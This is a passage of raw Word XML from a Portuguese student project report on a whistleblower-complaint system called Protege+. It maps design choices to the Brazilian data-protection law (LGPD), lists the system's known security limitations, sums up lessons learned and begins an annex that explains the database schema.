        <w:t xml:space="preserve">origem_analise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque decisão automatizada precisa ter fundamento declarado e rastreável, como exige o art. 20 da LGPD (BRASIL, 2018a).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sem a chave de API, o sistema continua funcionando por regras explicáveis.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A ausência da IA degrada a qualidade da sugestão, não a operação do canal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkStart w:id="128" w:name="fundamento-legal-das-decisões"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.7 Fundamento legal das decisões</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As escolhas técnicas das seções anteriores não são preferências de estilo. Cada uma responde a um dever concreto, e o quadro abaixo amarra dispositivo, conteúdo e implementação.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2"/>
        <w:gridCol w:w="2683"/>
        <w:gridCol w:w="268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Dispositivo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o sistema atende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LGPD, art. 6.º, III (necessidade)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limitado ao mínimo necessário, com dados pertinentes, proporcionais e não excessivos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DTO por audiência, mascaramento no servidor, listagem sem relato, contexto de IA sem relato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LGPD, art. 6.º, VII (segurança)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 técnicas e administrativas aptas a proteger de acesso não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em três camadas, BCrypt, CORS por lista, limite por origem, armazenamento fora da pasta pública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LGPD, art. 6.º, X (responsabilização)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Demonstração da adoção de medidas eficazes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de auditoria encadeada, com verificação de integridade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LGPD, art. 18, VI (eliminação)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Direito do titular à eliminação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lógica que destrói o conteúdo e preserva a existência do registro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LGPD, art. 20 (decisão automatizada)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Direito a revisão e a informação sobre os critérios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Classificação por regras explicáveis, origem persistida, reanálise disponível e auditada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LGPD, art. 23 (poder público)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Tratamento para finalidade pública, com transparência e encarregado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Matrizes da seção 5.3, publicação das hipóteses de tratamento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LGPD, art. 46 (segurança desde a concepção)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Medidas observadas</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">desde a fase de concepção do produto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k-anonimato, DTO por audiência e limiar de exibição definidos no desenho, não depois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LGPD, art. 48 e Resolução CD/ANPD 15/2024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Comunicação de incidente em três dias úteis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e log técnico permitem reconstituir escopo e janela do incidente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13.460/2017, art. 10, §7.º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do requerente é informação com restrição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Identidade só é visível a GESTOR e ADMIN, e a leitura é auditada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13.460/2017, art.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 final em 30 dias, prorrogável uma vez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interno de 10 dias proposto na seção 4.3.1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Lei 13.608/2018, arts. 3.º e 4.º-B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Sigilo dos dados do informante e preservação da identidade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Anonimato graduado, elo de mão dupla, ausência de vínculo com cidadão em denúncia anônima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Decreto 9.492/2018, art. 23, §2.º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Denúncia anônima é apurada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público, sem exigência de conta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Decreto 10.153/2019, art. 6.º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Identificação preservada desde o recebimento; pseudonimização antes do encaminhamento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Exclusão lógica com anonimização; relato destruído e registro mantido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O ponto de tensão entre o art. 18, VI da LGPD e o dever de rastreabilidade da administração está resolvido explicitamente na seção 5.2.2, e é a decisão de projeto de que mais se orgulha este documento: os dois deveres foram atendidos ao mesmo tempo, e a restrição do banco obriga a que continuem sendo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="128"/>
    <w:bookmarkStart w:id="129" w:name="o-que-ainda-não-está-resolvido"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.8 O que ainda não está resolvido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Honestidade sobre limites é parte de uma análise de segurança. Um documento que só relata acertos não permite avaliar risco.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cadeia de hashes não é replicada fora do banco.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quem administra o banco pode reescrever a trilha inteira recalculando os hashes. O passo natural é publicar periodicamente o último hash num meio fora do alcance da mesma administração.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 limite por origem é mantido em memória.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Numa implantação com várias instâncias, cada uma teria seu próprio contador. Em produção, isso pertence a um cache distribuído.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A cifragem de campo em repouso vive no cliente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lgpd.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), herança da fase anterior. O lugar correto é o servidor, ou o próprio banco.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Não há revogação ativa de token.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O token tem validade de 8 horas, mas um token vazado vale até expirar. Uma lista de revogação, ou tokens de vida curta com renovação, é o caminho.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X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">é registrado sem validação de proxy confiável.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">É informação, não prova, e a trilha deveria dizer isso explicitamente ao auditor.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Os arquivos enviados não passam por antivírus.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A verificação de assinatura garante que o conteúdo é do formato declarado, não que ele seja inofensivo. Um canal em produção precisaria de varredura antes de disponibilizar o download.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 envio de evidência é autenticado apenas pelo protocolo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quem descobrir um protocolo válido pode anexar arquivos a ele. Os limites de quantidade, tamanho, formato e origem contêm o abuso, mas não o impedem. O custo dessa escolha é o preço do anonimato, que não permite exigir conta de quem denuncia.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 denunciante identificado existe no modelo físico e não na implementação.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">01_ddl_oracle.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cria a tabela</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CIDADAO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com nome, e-mail e telefone, e o CHECK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ck_denuncia_anonimato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">impede que uma denúncia anônima aponte para ela. A aplicação Java não tem entidade correspondente:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Denuncia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guarda apenas o endereço como dado identificável. Consequência prática: o formulário do canal identificado (nível 3) coleta nome e contato, mas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DenunciaRequest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">não declara esses campos, então</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">com a API no ar esses dois valores não são persistidos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Fechar a lacuna são quatro arquivos: os dois campos em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DenunciaRequest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Denuncia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a gravação no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DenunciaService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e o mascaramento condicional em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DenunciaMapper.detalhe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, chamando os métodos que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MascaraUtil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">já expõe.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  <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MascaraUtil.email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">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MascaraUtil.telefone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">são código sem chamador.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Estão implementados e corretos, mas hoje só</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">endereco()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é usado em produção, pelo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DenunciaMapper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e pelo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ExportacaoService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Enquanto o item acima não for resolvido, os dois são infraestrutura antecipada, e não medida em vigor.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Não há política formal de retenção.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O Decreto 10.153/2019 fixa cem anos de restrição de acesso aos elementos de identificação do denunciante (BRASIL, 2019); o sistema ainda não implementa prazos de retenção e descarte diferenciados por tipo de dado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nenhum desses pontos invalida o que foi construído. Todos são do tipo que uma fase seguinte, ou uma equipe de operação, precisaria endereçar antes de o sistema tratar denúncia real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="129"/>
    <w:bookmarkEnd w:id="130"/>
    <w:bookmarkStart w:id="134" w:name="encerramento"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Encerramento</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="131" w:name="síntese-da-entrega"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Síntese da entrega</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O Protege+ chega ao fim da Fase 5 como um sistema completo, e não como um conjunto de telas. O quadro abaixo resume o que existe e onde verificar cada item.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44"/>
        <w:gridCol w:w="3696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Onde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RESTful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rotas em 9 controladores, OpenAPI 3 executável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3, Swagger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CRUD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recursos com ciclo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3.2, Anexo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Front-end integrado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Portal, painel e interface React consumindo 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3.3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Estruturas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Lista, fila de prioridade e pilha, com endpoints próprios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4.1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Relatório estatístico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gráficos, medidas calculadas no servidor, 25 testes dedicados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4.2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Interpretações e sugestões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recomendações amarradas a números e a fontes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Controle de acesso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perfis, RBAC em três camadas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5.2 e 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Proteção de dado sensível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medidas, do BCrypt ao k-anonimato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5.2.2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Trilha de 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ações, 15 endpoints, cadeia SHA-256 verificável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Redução de exposição na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medidas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tabelas, 30 CHECK, 13 índices, 11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 testes JUnit em 11 conjuntos, mais bateria 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Fundamentação externa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fontes citadas no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E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkStart w:id="132" w:name="o-que-esta-fase-ensinou"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 O que esta fase ensinou</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Três lições concretas, e todas têm a mesma raiz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cada parte funcionava isoladamente, e o sistema mentia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Os quatro defeitos mais graves desta fase não foram erros de lógica dentro de uma classe. Foram defeitos de costura: o filtro de autenticação que ignorava o perfil do token, o login que não falava com a API, o portal que gravava no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enquanto a API estava pronta ao lado, e o botão de detalhe que levava o gestor à tela do cidadão. Todos passaram por revisão de código sem chamar atenção, porque cada peça, olhada sozinha, estava correta.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Só a execução ponta a ponta os revelou.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Teste unitário verde não é sistema funcionando.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Os 81 testes desta fase são úteis e continuarão sendo, mas nenhum deles faz a pergunta que encontrou os defeitos acima:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esta denúncia que acabei de registrar aparece do outro lado?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A verificação registrada no Anexo D existe por isso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Um mecanismo de proteção que nunca acusa nada não prova que funciona.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vale para a cadeia de hashes, cujos testes adulteram a trilha de propósito, e vale para o RBAC, cuja demonstração é a recusa visível na tela, e não o botão escondido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uma quarta lição é metodológica e diz respeito a este documento:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">decisão de projeto sem fonte é opinião</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Reescrever as justificativas amarrando cada escolha a uma norma, a um dado público ou a um artigo mudou algumas decisões pelo caminho, entre elas a formulação do SLA da seção 4.3.1, que passou a dialogar com o prazo legal de trinta dias da Lei 13.460/2017 em vez de nascer apenas da distribuição observada.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="132"/>
    <w:bookmarkStart w:id="133" w:name="limites-e-próximos-passos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Limites e próximos passos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Os limites técnicos estão listados na seção 5.8 e não se repetem aqui. Além deles, três frentes de produto ficam abertas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Alerta de envelhecimento no backlog.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">É a recomendação 3 da seção 4.3.1 e a mais urgente das oito, porque a análise mostrou cinco casos críticos parados há 78,84 dias em média. A fila de prioridade já sabe ordenar por urgência e antiguidade; falta o gatilho que avisa alguém.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Decisão sobre o score.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Com r igual a −0,091, ele não influencia o tempo de atendimento. Ou o painel declara isso explicitamente, ou o score passa a pesar na priorização. Manter como está é a única opção que não faz sentido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Subdivisão da categoria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Outros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É a mais lenta, a mais dispersa e a dona do único outlier. Enquanto for uma categoria residual, continuará sendo uma fila sem dono.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:id="145" w:name="anexo-a-o-modelo-físico-bloco-a-bloco"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anexo A: O modelo físico, bloco a bloco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este anexo atende diretamente à ressalva D1 recebida em fase anterior, segundo a qual os scripts DDL não podem ficar apenas em link de repositório e precisam estar documentados e explicados no próprio PDF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">database/01_ddl_oracle.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">12 tabelas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 12 chaves primárias (uma composta),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">11 chaves estrangeiras</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 6 restrições UNIQUE,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">30 restrições CHECK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 13 índices e 30 comentários de tabela e de coluna. As seções abaixo explicam as decisões que não são óbvias ao ler o script.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="135" w:name="a.1-chave-natural-nos-domínios"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.1 Chave natural nos domínios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As três tabelas de domínio,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">STATUS_DENUNCIA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TIPO_DENUNCIA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, usam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chave natural</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a sigla é a própria chave primária.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STATUS_DENUNCIA (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    status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descricao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ordem_fluxo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status_denuncia_pk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(status),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ck_status_ordem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(ordem_fluxo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A alternativa convencional seria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id_status NUMBER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com a sigla num campo à parte. Aqui isso criaria um problema real: a entidade JPA grava</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">status = 'recebida'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como texto. Com chave substituta, o texto que a aplicação escreve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não seria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a chave estrangeira, e o script documentado descreveria um banco diferente do que a aplicação usa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Com chave natural, a coluna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DENUNCIA.status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a chave estrangeira para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">STATUS_DENUNCIA(status)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. O modelo documentado e o modelo em execução são o mesmo, e essa é a razão da escolha, não elegância teórica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ordem_fluxo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">existe para permitir detectar transições fora de ordem. Sem ele,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">concluída para recebida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seria indistinguível de um avanço normal.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="136" w:name="a.2-a-tabela-central"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.2 A tabela central</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
